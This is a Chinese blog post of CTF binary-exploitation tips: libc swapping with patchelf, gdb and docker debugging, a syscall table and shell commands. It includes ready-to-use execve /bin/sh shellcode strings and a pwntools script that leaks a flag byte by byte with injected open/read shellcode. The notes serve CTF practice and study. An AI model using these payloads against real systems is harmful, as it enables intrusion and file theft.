Anza | 学习记录
0%

技巧总结

发表于 更新于 分类于

总结一些常用的技巧。

patchelf——替换文件的libc和ld

如果出题方没有提供libcld,请看技巧glibc-all-in-one——查找libc/ld/.debug

更换前:

装载命令:

1
2
3
4
5
6
7
# 新ld和libc均使用绝对路径
# 更换ld
# patchelf --set-interpreter /path/to/ld.so /path/to/binary
patchelf --set-interpreter /home/anza/hgame/spfa/ld-2.31.so ./spfa
# 更换libc
# patchelf --replace-needed originlibc newlibc /path/to/binary
patchelf --replace-needed libc.so.6 /home/anza/hgame/spfa/libc-2.31.so ./spfa

更换后:

glibc-all-in-one——查找libc/ld/.debug

patchelf修改了libcld,而gdb调试时会去寻找libc目录下的.debug文件,所以无法使用一些heap/bins之类的命令,因此我们去glibc-all-in-one中下载对应版本的libc及其附带的.debug

实现操作如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
cd /glibc-all-in-one/

fuzz@fuzz-virtual-machine:/glibc-all-in-one$ sudo python3 update_list
[+] Common list has been save to "list"
[+] Old-release list has been save to "old_list"

fuzz@fuzz-virtual-machine:/glibc-all-in-one$ cat list
2.23-0ubuntu11.3_amd64
2.23-0ubuntu11.3_i386
2.23-0ubuntu3_amd64
2.23-0ubuntu3_i386
2.27-3ubuntu1.5_amd64
2.27-3ubuntu1.5_i386
2.27-3ubuntu1.6_amd64
2.27-3ubuntu1.6_i386
2.27-3ubuntu1_amd64
2.27-3ubuntu1_i386
2.31-0ubuntu9.7_amd64
2.31-0ubuntu9.7_i386
2.31-0ubuntu9.9_amd64
2.31-0ubuntu9.9_i386
2.31-0ubuntu9_amd64
2.31-0ubuntu9_i386
2.35-0ubuntu3.1_amd64
2.35-0ubuntu3.1_i386
2.35-0ubuntu3_amd64
2.35-0ubuntu3_i386
2.36-0ubuntu1_amd64
2.36-0ubuntu1_i386

fuzz@fuzz-virtual-machine:/glibc-all-in-one$ sudo ./download 2.31-0ubuntu9.7_amd64
fuzz@fuzz-virtual-machine:/glibc-all-in-one$ cd libs/
fuzz@fuzz-virtual-machine:/glibc-all-in-one/libs$ ls
2.31-0ubuntu9.7_amd64
fuzz@fuzz-virtual-machine:/glibc-all-in-one/libs$ cd 2.31-0ubuntu9.7_amd64

在该目录下ctrl+h便能显示出隐藏文件.debug,将.debug复制到题目的目录下,gdb调试命令就恢复了。

gdb带基址调试

1
b *$rebase(0x相对基址偏移)

关闭Alarm

命令行关闭法:

1
sed -i s/alarm/isnan/g ./vuln

docker调试命令

基本命令:

1
2
3
4
docker ps -a
docker start 容器id
docker exec -it 容器id /bin/bash
docker cp 本地路径 容器id:容器路径

docker 打开 tmux,以及打开鼠标滚动:

1
tmux new

docker 在 tmux 下调试脚本需添加:

1
context.terminal = ['tmux', 'sp', '-h']

一些shellcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# 32位 短字节shellcode --> 21字节
\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80

# 32位 纯ascii字符shellcode
PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJISZTK1HMIQBSVCX6MU3K9M7CXVOSC3XS0BHVOBBE9RNLIJC62ZH5X5PS0C0FOE22I2NFOSCRHEP0WQCK9KQ8MK0AA

# 32位 scanf可读取的shellcode
\xeb\x1b\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x29\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x29\xc0\xab\xb0\x08\x04\x03\xcd\x80\xe8\xe0\xff\xff\xff/bin/sh

# 64位 scanf可读取的shellcode 22字节
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05

# 64位 较短的shellcode  23字节
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05

# 64位 纯ascii字符shellcode
Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t

可能用到的爆破脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
from pwn import *
import string


# # 这里的pwn只是为了演示流程,具体逻辑还得看题目
def pwn(p, index, ch):
	code = "push 0x67616c66; mov rdi, rsp; mov rsi, 0x0; mov rax, 0x2; syscall;"  # open
	code += "mov rdi, 0x3; mov rsi, rsp; mov rdx, 0x30; mov rax, 0x0; syscall;"   # read
	code += "cmp byte ptr[rsi+{}], {}; jz loop;".format(index, ch)                # cmp
	code += "xor edi, edi; mov rax, 60; syscall; loop: jmp loop;"                 # 等则进入死循环,否则exit(0)
	code = b"\x90"*20+asm(code)  # 前面加了\x90滑板

	p.send(code)

def main():
    flag = ""
    flag_str = string.printable
    for offset in range(0x30):
        index = 0
        while True:
            p = process("./babystack")
            try:
                ch = flag_str[index]
                print(">>>>>>>>>>> test ch {}".format(ch))
                pwn(p, offset, ord(flag_str[index]))
                p.recv(timeout=1)
                flag += ch
                print(">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> find flag: ", flag)
                p.close()
                index += 1
                break
            except Exception as e:
                # 捕获p.recv产生的错误
                print("="*10)
                print(e)
                print("="*10)
                try:
                    p.close()
                    index += 1
                except Exception as e:
                    # 捕获p.close产生的错误
                    print("="*10)
                    print(e)
                    print("="*10)
                    continue
        if flag[-1] == "}":
        	# 判断flag是否已经结束
            break

main()

linux 下查找

​ 查找内容包含特定字符串的文件:

1
grep -rn "__dls3" ./

​ 查找文件名中包含特定字符串的文件:

1
find ./ -name '*2021-11-01*'

常见 signal

image-20230907201341848

64 位系统调用

系统调用号 函数名 入口点
0 read sys_read
1 write sys_write
2 open sys_open
3 close sys_close
4 stat sys_newstat
5 fstat sys_newfstat
6 lstat sys_newlstat
7 poll sys_poll
8 lseek sys_lseek
9 mmap sys_mmap
10 mprotect sys_mprotect
11 munmap sys_munmap
12 brk sys_brk
13 rt_sigaction sys_rt_sigaction
14 rt_sigprocmask sys_rt_sigprocmask
15 rt_sigreturn stub_rt_sigreturn
16 ioctl sys_ioctl
17 pread64 sys_pread64
18 pwrite64 sys_pwrite64
19 readv sys_readv
20 writev sys_writev
21 access sys_access
22 pipe sys_pipe
23 select sys_select
24 sched_yield sys_sched_yield
25 mremap sys_mremap
26 msync sys_msync
27 mincore sys_mincore
28 madvise sys_madvise
29 shmget sys_shmget
30 shmat sys_shmat
31 shmctl sys_shmctl
32 dup sys_dup
33 dup2 sys_dup2
34 pause sys_pause
35 nanosleep sys_nanosleep
36 getitimer sys_getitimer
37 alarm sys_alarm
38 setitimer sys_setitimer
39 getpid sys_getpid
40 sendfile sys_sendfile64
41 socket sys_socket
42 connect sys_connect
43 accept sys_accept
44 sendto sys_sendto
45 recvfrom sys_recvfrom
46 sendmsg sys_sendmsg
47 recvmsg sys_recvmsg
48 shutdown sys_shutdown
49 bind sys_bind
50 listen sys_listen
51 getsockname sys_getsockname
52 getpeername sys_getpeername
53 socketpair sys_socketpair
54 setsockopt sys_setsockopt
55 getsockopt sys_getsockopt
56 clone stub_clone
57 fork stub_fork
58 vfork stub_vfork
59 execve stub_execve
60 exit sys_exit
61 wait4 sys_wait4
62 kill sys_kill
63 uname sys_newuname
64 semget sys_semget
65 semop sys_semop
66 semctl sys_semctl
67 shmdt sys_shmdt
68 msgget sys_msgget
69 msgsnd sys_msgsnd
70 msgrcv sys_msgrcv
71 msgctl sys_msgctl
72 fcntl sys_fcntl
73 flock sys_flock
74 fsync sys_fsync
75 fdatasync sys_fdatasync
76 truncate sys_truncate
77 ftruncate sys_ftruncate
78 getdents sys_getdents
79 getcwd sys_getcwd
80 chdir sys_chdir
81 fchdir sys_fchdir
82 rename sys_rename
83 mkdir sys_mkdir
84 rmdir sys_rmdir
85 creat sys_creat
86 link sys_link
87 unlink sys_unlink
88 symlink sys_symlink
89 readlink sys_readlink
90 chmod sys_chmod
91 fchmod sys_fchmod
92 chown sys_chown
93 fchown sys_fchown
94 lchown sys_lchown
95 umask sys_umask
96 gettimeofday sys_gettimeofday
97 getrlimit sys_getrlimit
98 getrusage sys_getrusage
99 sysinfo sys_sysinfo
100 times sys_times
101 ptrace sys_ptrace
102 getuid sys_getuid
103 syslog sys_syslog
104 getgid sys_getgid
105 setuid sys_setuid
106 setgid sys_setgid
107 geteuid sys_geteuid
108 getegid sys_getegid
109 setpgid sys_setpgid
110 getppid sys_getppid
111 getpgrp sys_getpgrp
112 setsid sys_setsid
113 setreuid sys_setreuid
114 setregid sys_setregid
115 getgroups sys_getgroups
116 setgroups sys_setgroups
117 setresuid sys_setresuid
118 getresuid sys_getresuid
119 setresgid sys_setresgid
120 getresgid sys_getresgid
121 getpgid sys_getpgid
122 setfsuid sys_setfsuid
123 setfsgid sys_setfsgid
124 getsid sys_getsid
125 capget sys_capget
126 capset sys_capset
127 rt_sigpending sys_rt_sigpending
128 rt_sigtimedwait sys_rt_sigtimedwait
129 rt_sigqueueinfo sys_rt_sigqueueinfo
130 rt_sigsuspend sys_rt_sigsuspend
131 sigaltstack sys_sigaltstack
132 utime sys_utime
133 mknod sys_mknod
134 uselib
135 personality sys_personality
136 ustat sys_ustat
137 statfs sys_statfs
138 fstatfs sys_fstatfs
139 sysfs sys_sysfs
140 getpriority sys_getpriority
141 setpriority sys_setpriority
142 sched_setparam sys_sched_setparam
143 sched_getparam sys_sched_getparam
144 sched_setscheduler sys_sched_setscheduler
145 sched_getscheduler sys_sched_getscheduler
146 sched_get_priority_max sys_sched_get_priority_max
147 sched_get_priority_min sys_sched_get_priority_min
148 sched_rr_get_interval sys_sched_rr_get_interval
149 mlock sys_mlock
150 munlock sys_munlock
151 mlockall sys_mlockall
152 munlockall sys_munlockall
153 vhangup sys_vhangup
154 modify_ldt sys_modify_ldt
155 pivot_root sys_pivot_root
156 _sysctl sys_sysctl
157 prctl sys_prctl
158 arch_prctl sys_arch_prctl
159 adjtimex sys_adjtimex
160 setrlimit sys_setrlimit
161 chroot sys_chroot
162 sync sys_sync
163 acct sys_acct
164 settimeofday sys_settimeofday
165 mount sys_mount
166 umount2 sys_umount
167 swapon sys_swapon
168 swapoff sys_swapoff
169 reboot sys_reboot
170 sethostname sys_sethostname
171 setdomainname sys_setdomainname
172 iopl stub_iopl
173 ioperm sys_ioperm
174 create_module
175 init_module sys_init_module
176 delete_module sys_delete_module
177 get_kernel_syms
178 query_module
179 quotactl sys_quotactl
180 nfsservctl
181 getpmsg
182 putpmsg
183 afs_syscall
184 tuxcall
185 security
186 gettid sys_gettid
187 readahead sys_readahead
188 setxattr sys_setxattr
189 lsetxattr sys_lsetxattr
190 fsetxattr sys_fsetxattr
191 getxattr sys_getxattr
192 lgetxattr sys_lgetxattr
193 fgetxattr sys_fgetxattr
194 listxattr sys_listxattr
195 llistxattr sys_llistxattr
196 flistxattr sys_flistxattr
197 removexattr sys_removexattr
198 lremovexattr sys_lremovexattr
199 fremovexattr sys_fremovexattr
200 tkill sys_tkill
201 time sys_time
202 futex sys_futex
203 sched_setaffinity sys_sched_setaffinity
204 sched_getaffinity sys_sched_getaffinity
205 set_thread_area
206 io_setup sys_io_setup
207 io_destroy sys_io_destroy
208 io_getevents sys_io_getevents
209 io_submit sys_io_submit
210 io_cancel sys_io_cancel
211 get_thread_area
212 lookup_dcookie sys_lookup_dcookie
213 epoll_create sys_epoll_create
214 epoll_ctl_old
215 epoll_wait_old
216 remap_file_pages sys_remap_file_pages
217 getdents64 sys_getdents64
218 set_tid_address sys_set_tid_address
219 restart_syscall sys_restart_syscall
220 semtimedop sys_semtimedop
221 fadvise64 sys_fadvise64
222 timer_create sys_timer_create
223 timer_settime sys_timer_settime
224 timer_gettime sys_timer_gettime
225 timer_getoverrun sys_timer_getoverrun
226 timer_delete sys_timer_delete
227 clock_settime sys_clock_settime
228 clock_gettime sys_clock_gettime
229 clock_getres sys_clock_getres
230 clock_nanosleep sys_clock_nanosleep
231 exit_group sys_exit_group
232 epoll_wait sys_epoll_wait
233 epoll_ctl sys_epoll_ctl
234 tgkill sys_tgkill
235 utimes sys_utimes
236 vserver
237 mbind sys_mbind
238 set_mempolicy sys_set_mempolicy
239 get_mempolicy sys_get_mempolicy
240 mq_open sys_mq_open
241 mq_unlink sys_mq_unlink
242 mq_timedsend sys_mq_timedsend
243 mq_timedreceive sys_mq_timedreceive
244 mq_notify sys_mq_notify
245 mq_getsetattr sys_mq_getsetattr
246 kexec_load sys_kexec_load
247 waitid sys_waitid
248 add_key sys_add_key
249 request_key sys_request_key
250 keyctl sys_keyctl
251 ioprio_set sys_ioprio_set
252 ioprio_get sys_ioprio_get
253 inotify_init sys_inotify_init
254 inotify_add_watch sys_inotify_add_watch
255 inotify_rm_watch sys_inotify_rm_watch
256 migrate_pages sys_migrate_pages
257 openat sys_openat
258 mkdirat sys_mkdirat
259 mknodat sys_mknodat
260 fchownat sys_fchownat
261 futimesat sys_futimesat
262 newfstatat sys_newfstatat
263 unlinkat sys_unlinkat
264 renameat sys_renameat
265 linkat sys_linkat
266 symlinkat sys_symlinkat
267 readlinkat sys_readlinkat
268 fchmodat sys_fchmodat
269 faccessat sys_faccessat
270 pselect6 sys_pselect6
271 ppoll sys_ppoll
272 unshare sys_unshare
273 set_robust_list sys_set_robust_list
274 get_robust_list sys_get_robust_list
275 splice sys_splice
276 tee sys_tee
277 sync_file_range sys_sync_file_range
278 vmsplice sys_vmsplice
279 move_pages sys_move_pages
280 utimensat sys_utimensat
281 epoll_pwait sys_epoll_pwait
282 signalfd sys_signalfd
283 timerfd_create sys_timerfd_create
284 eventfd sys_eventfd
285 fallocate sys_fallocate
286 timerfd_settime sys_timerfd_settime
287 timerfd_gettime sys_timerfd_gettime
288 accept4 sys_accept4
289 signalfd4 sys_signalfd4
290 eventfd2 sys_eventfd2
291 epoll_create1 sys_epoll_create1
292 dup3 sys_dup3
293 pipe2 sys_pipe2
294 inotify_init1 sys_inotify_init1
295 preadv sys_preadv
296 pwritev sys_pwritev
297 rt_tgsigqueueinfo sys_rt_tgsigqueueinfo
298 perf_event_open sys_perf_event_open
299 recvmmsg sys_recvmmsg
300 fanotify_init sys_fanotify_init
301 fanotify_mark sys_fanotify_mark
302 prlimit64 sys_prlimit64
303 name_to_handle_at sys_name_to_handle_at
304 open_by_handle_at sys_open_by_handle_at
305 clock_adjtime sys_clock_adjtime
306 syncfs sys_syncfs
307 sendmmsg sys_sendmmsg
308 setns sys_setns
309 getcpu sys_getcpu
310 process_vm_readv sys_process_vm_readv
311 process_vm_writev sys_process_vm_writev
312 kcmp sys_kcmp
313 finit_module sys_finit_module

Python 调用给定 libc 环境的种子 rand

1
2
3
4
5
libc = ctypes.CDLL("libc.so.6")

libc.srand.argtypes = [ctypes.c_uint]
libc.srand(0x39)
rand_result = libc.rand()

linux 下的解压方法

1
2
3
4
5
6
7
8
9
*.tar				tar –xvf
*.gz				gzip -d 或 gunzip 
*.tar.gz/*.tgz		tar –xzf
*.bz2				bzip2 -d 或 bunzip2
*.tar.bz2			tar –xjf
*.Z					uncompress
*.tar.Z				tar –xZf 
*.rar				unrar e
*.zip				unzip

参考

Glibc-All-In-One

关于不同版本 glibc 更换的一些问题

pwn题shellcode收集